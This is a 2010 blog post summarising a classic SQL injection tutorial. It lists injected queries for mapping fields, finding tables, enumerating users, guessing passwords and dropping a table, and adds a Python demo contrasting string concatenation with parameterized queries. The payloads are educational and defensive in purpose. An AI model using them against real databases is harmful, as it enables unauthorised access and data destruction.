Monday, May 24, 2010

SQL Injection for Dummies


This is pretty old but pretty cool!

The original article can be found at
http://unixwiz.net/techtips/sql-injection.html

Schema field mapping
SELECT fieldlist
FROM table
WHERE field = 'x' AND email IS NULL; --';

SELECT fieldlist
FROM table
WHERE email = 'x' AND userid IS NULL; --';

Probing this way reveals several valid field names:
email, passwd, login_id, full_name

Finding the table name
SELECT email, passwd, login_id, full_name
FROM table
WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';

SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x' AND members.email IS NULL; --';

Finding some users
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x' OR full_name LIKE '%Bob%';

Brute-force password guessing
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'bob@example.com' AND passwd = 'hello123';

The database isn't read-only
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x'; DROP TABLE members; --'; -- Boom!
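Every query above works because the user-supplied value is pasted straight into the SQL text. As an added example (not from this post or from the unixwiz article), the following Python snippet builds the "Finding some users" query both ways against a constructed in-memory SQLite table named members with the same four fields: the string-concatenation version lets the input rewrite the WHERE clause and return Bob's row, while the parameterized version binds the same input as a plain value and matches nothing. The table contents, the helper names and the use of sqlite3 are assumptions made for the demonstration.

```python
import sqlite3

FIELDS = "email, passwd, login_id, full_name"

# Constructed sample data (assumption for this example): the column names are
# the ones the page's probing reveals, the rows are invented.
SAMPLE_ROWS = [
    ("bob@example.com", "hello123", "bob", "Bob Smith"),
    ("alice@example.com", "s3cret", "alice", "Alice Jones"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory members table holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (email TEXT, passwd TEXT, login_id TEXT, full_name TEXT)"
    )
    conn.executemany("INSERT INTO members VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def vulnerable_query_text(email: str) -> str:
    """Build the query by string concatenation, the way the post's examples assume.

    Whatever the caller passes becomes part of the SQL grammar, so a value
    containing a quote can close the literal and append its own conditions.
    """
    return f"SELECT {FIELDS} FROM members WHERE email = '{email}'"


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> list:
    """Run the concatenated query exactly as built."""
    return conn.execute(vulnerable_query_text(email)).fetchall()


def lookup_safe(conn: sqlite3.Connection, email: str) -> list:
    """Hardened form: the driver binds the value to a placeholder.

    The SQL text is fixed before any user data is seen, so the input can only
    ever be compared as a string and never parsed as SQL.
    """
    return conn.execute(
        f"SELECT {FIELDS} FROM members WHERE email = ?", (email,)
    ).fetchall()


# The input that turns the lookup into the post's "Finding some users" query
# once the application wraps it in single quotes.
PAYLOAD = "x' OR full_name LIKE '%Bob%"


if __name__ == "__main__":
    db = make_db()
    print("Query sent by the vulnerable code:")
    print("  " + vulnerable_query_text(PAYLOAD))
    print("Rows returned (concatenation):", lookup_vulnerable(db, PAYLOAD))
    print("Rows returned (parameterized): ", lookup_safe(db, PAYLOAD))
    print("Legitimate lookup:            ", lookup_safe(db, "bob@example.com"))
```

Running the script prints the concatenated query text, which is character for character the "Finding some users" statement from the post, followed by Bob's row from the vulnerable path and an empty list from the parameterized path. The fix is not escaping or filtering quotes but keeping the SQL text constant and passing values through placeholders; the same change neutralizes the field-mapping, table-discovery and DROP TABLE inputs shown above, because none of them can leave the bound value.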
